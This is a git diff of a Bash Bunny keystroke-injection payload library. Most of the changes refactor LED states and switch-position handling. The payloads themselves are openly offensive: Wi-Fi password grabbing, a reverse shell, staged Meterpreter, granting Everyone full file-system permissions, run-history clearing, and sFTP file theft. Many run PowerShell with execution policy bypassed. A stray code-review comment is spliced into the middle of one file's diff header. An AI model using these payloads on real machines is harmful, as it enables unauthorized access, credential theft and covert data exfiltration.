@@ -78,7 +78,6 @@ if [ "$OS" = "MAC" ]; then RUN OSX "terminal" QUACK STRING "open \"http://www.windows93.net\" && osascript -e \"sleep 3;ccf;\";" elif [ "$OS" = "LINUX" ]; then - DUCKY_LANG fr RUN UNITY "xterm" QUACK STRING "chromium-browser --start-fullscreen --incognito --new-window http://www.windows93.net &; exit;" QUACK ENTER diff --git a/payloads/library/recon/InfoGrabber/payload.txt b/payloads/library/recon/InfoGrabber/payload.txt index aad67e3c..5a67261f 100644 --- a/payloads/library/recon/InfoGrabber/payload.txt +++ b/payloads/library/recon/InfoGrabber/payload.txt @@ -5,39 +5,19 @@ # Version: 1.0 # Target: Windows # Creds: Hak5Darren for inspiration -# +# # Executes run.ps1 which executes scripts that gets you information about # the computer running and will also get wifi passwords -LED R B 100 +LED SETUP ATTACKMODE HID STORAGE +GET SWITCH_POSITION -#Check swith copied from bunny_helper - -check_switch() { - switch1=`cat /sys/class/gpio_sw/PA8/data` - switch2=`cat /sys/class/gpio_sw/PL4/data` - switch3=`cat /sys/class/gpio_sw/PL3/data` - if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then - SWITCH_POSITION="switch1" - elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then - SWITCH_POSITION="switch2" - elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then - SWITCH_POSITION="switch3" - else - SWITCH_POSITION="invalid" - fi -} - -check_switch - -# Set your language here -QUACK SET_LANGUAGE no +LED ATTACK QUACK GUI r QUACK DELAY 200 # Open run and run the run.ps1 script in the Bashbunny QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" QUACK ENTER -LED G -#Green means good to go +LED FINISH diff --git a/payloads/library/recon/Link File analysis/payload.txt b/payloads/library/recon/Link File analysis/payload.txt deleted file mode 100644 index 2af8f84c..00000000 
--- a/payloads/library/recon/Link File analysis/payload.txt +++ /dev/null @@ -1,12 +0,0 @@ - - - -LED R B 100 -ATTACKMODE HID STORAGE - - -DUCKY_LANG gb -LED B -RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" -LED G FAST -#Green means good to go diff --git a/payloads/library/Incident_Response/Link File analysis/payload.txt b/payloads/library/recon/Link_File_analysis/payload.txt similarity index 65% rename from payloads/library/Incident_Response/Link File analysis/payload.txt rename to payloads/library/recon/Link_File_analysis/payload.txt index 2af8f84c..14525305 100644 --- a/payloads/library/Incident_Response/Link File analysis/payload.txt +++ b/payloads/library/recon/Link_File_analysis/payload.txt @@ -1,12 +1,7 @@ - - - -LED R B 100 +LED SETUP ATTACKMODE HID STORAGE +GET SWITCH_POSITION - -DUCKY_LANG gb -LED B +LED ATTACK RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" -LED G FAST -#Green means good to go +LED FINISH diff --git a/payloads/library/recon/Link File analysis/readme.md b/payloads/library/recon/Link_File_analysis/readme.md similarity index 100% rename from payloads/library/recon/Link File analysis/readme.md rename to payloads/library/recon/Link_File_analysis/readme.md diff --git a/payloads/library/recon/Link File analysis/run.ps1 b/payloads/library/recon/Link_File_analysis/run.ps1 similarity index 100% rename from payloads/library/recon/Link File analysis/run.ps1 rename to payloads/library/recon/Link_File_analysis/run.ps1 diff --git a/payloads/library/recon/PrivEscChecker/payload.txt b/payloads/library/recon/PrivEscChecker/payload.txt index 88dc1b85..3b80e7c1 100644 --- a/payloads/library/recon/PrivEscChecker/payload.txt +++ b/payloads/library/recon/PrivEscChecker/payload.txt 
@@ -15,10 +15,8 @@ # Green..............Found Possible Privilege Escalation # Red................No Possible Privilege Escalation -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R 200 +LED SETUP +GET SWITCH_POSITION LOOTDIR=/root/udisk/loot/PrivEscChecker mkdir -p $LOOTDIR #cleanup any prior unfinished payloads @@ -26,7 +24,7 @@ rm $LOOTDIR/DONE rm $LOOTDIR/OUTPUT ATTACKMODE HID STORAGE -LED B 200 +LED ATTACK # wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter Q DELAY 6000 @@ -57,7 +55,7 @@ Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \ Q ENTER Q DELAY 100 -# Eject the USB Safely +# Eject the USB Safely Q STRING \$Eject \= New-Object -comObject Shell.Application Q ENTER Q DELAY 100 @@ -68,7 +66,7 @@ Q ENTER sync #remount the drive and check results -LED R B 200 +LED CLEANUP sleep 1 # Wait for the DONE file to be created so we know powershell is finished LOOTDIR=/root/udisk/loot/PrivEscChecker @@ -84,7 +82,7 @@ rm -f $DONEFILE # Check OUTPUT.txt for any missing patches if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then - LED G 200 -else - LED R -fi \ No newline at end of file + LED FINISH +else + LED FAIL +fi diff --git a/payloads/library/remote_access/LinuxReverseShell/payload.txt b/payloads/library/remote_access/LinuxReverseShell/payload.txt index 9a2b985c..3125ae15 100644 --- a/payloads/library/remote_access/LinuxReverseShell/payload.txt +++ b/payloads/library/remote_access/LinuxReverseShell/payload.txt @@ -17,6 +17,9 @@ RPORT=4444 # Start Setup LED SETUP +# Gets Switch Position +GET SWITCH_POSITION + # Set Attack Mode ATTACKMODE HID STORAGE diff --git a/payloads/library/remote_access/NothingLess/payload.txt b/payloads/library/remote_access/NothingLess/payload.txt index 097a6e50..b41869fb 100644 --- a/payloads/library/remote_access/NothingLess/payload.txt +++ b/payloads/library/remote_access/NothingLess/payload.txt 
@@ -4,18 +4,18 @@ # Author: StinkyBliss # Version: 1.0 # Target: Windows -# -# +# +# # Maps the file system and stores it in c:\users\tempa # Shares a location to everyone and grants full security permissions to everyone -# +# # For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions # To share a drive change the path in nl.cmd to c: remove the quotes -LED R 200 +LED SETUP +GET SWITCH_POSITION -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh +LED STAGE1 ATTACKMODE HID @@ -30,12 +30,12 @@ Q DELAY 1000 Q LEFT Q ENTER -LED R G 200 +LED STAGE2 ATTACKMODE HID STORAGE # Start nl.cmd -Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')" +Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')" Q ENTER # Wait for nl.cmd and exit @@ -45,4 +45,4 @@ Q ENTER sync -LED G \ No newline at end of file +LED FINISH diff --git a/payloads/library/remote_access/USB_Intruder/payload.txt b/payloads/library/remote_access/USB_Intruder/payload.txt index ccf2d5eb..5adf51da 100644 --- a/payloads/library/remote_access/USB_Intruder/payload.txt +++ b/payloads/library/remote_access/USB_Intruder/payload.txt @@ -17,12 +17,13 @@ #Green - Attack Completion #Initialization - Setting AttackModes -LED W +LED SETUP ATTACKMODE HID STORAGE +GET SWITCH_POSITION #Initialization Completed #Beginning of HID/STORAGE Phase -LED B 10 +LED ATTACK #Description:: Q DELAY 2000 Q GUI d @@ -61,7 +62,7 @@ Q DELAY 500 #End of HID/STORAGE Phase #Cleanup -LED Y 100 +LED CLEANUP #Clears complete run history Q GUI r Q DELAY 500 @@ -70,7 +71,6 @@ Q ENTER #End of Cleanup #Completion of script -LED G 100 sync -LED G +LED FINISH #Completed diff --git a/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt b/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt index 4c6300e6..d4b81ea2 100644 
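Review bot: In NothingLess, the new `Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')"` line has `\$` inside double quotes, which bash treats as an escape for a literal `$`, so `${SWITCH_POSITION}` is never expanded and the backslash before it is consumed; the typed path becomes `payloads${SWITCH_POSITION}\nl.cmd`. The other payloads in this commit use `'payloads\\$SWITCH_POSITION\...'` (escaped backslash, then the expansion); this line should follow the same form, `...'payloads\\${SWITCH_POSITION}\nl.cmd')"`.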
--- a/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt +++ b/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt @@ -3,7 +3,6 @@ LED G REM set attackmode to HID device ATTACKMODE HID REM set keyboard -DUCKY_LANG us REM open run menu Q GUI r Q DELAY 1000 diff --git a/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt b/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt index 2621808c..0e315c4b 100755 --- a/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt +++ b/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt @@ -29,20 +29,19 @@ # Red: failure to load dependency ducky script # +LED SETUP + +GET SWITCH_POSITION ATTACKMODE HID -LED R G 200 - -LANGUAGE='us' - -source bunny_helpers.sh +LED ATTACK if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt - LED G + LED FINISH else - LED R + LED FAIL echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt exit 1 fi diff --git a/payloads/library/sFTP Directory Grabber/payload.txt b/payloads/library/sFTP Directory Grabber/payload.txt index 228a7aed..e7d956b1 100644 --- a/payloads/library/sFTP Directory Grabber/payload.txt +++ b/payloads/library/sFTP Directory Grabber/payload.txt @@ -6,7 +6,7 @@ # Version: 1.0 # Target: Windows 7+ # NOTICE: HAK5 is not responsible for the execution of 3rd party binaries! -# +# # Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd. # e.cmd is excuted invisibly using i.vbs # which in turn copies psftp.exe from the root of the Bash Bunny and then executes it 
@@ -16,16 +16,15 @@ # SET lootfrom=c:\users\username\documents # SET looto=/loot # -#IMPORTANT: +#IMPORTANT: #To Download psftp.exe please use one of the links below: #32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe #64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe #Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload. # -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh -LED R +LED SETUP +GET SWITCH_POSITION ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 100 @@ -33,4 +32,4 @@ QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'pa QUACK ENTER # Green LED for finished -LED G +LED FINISH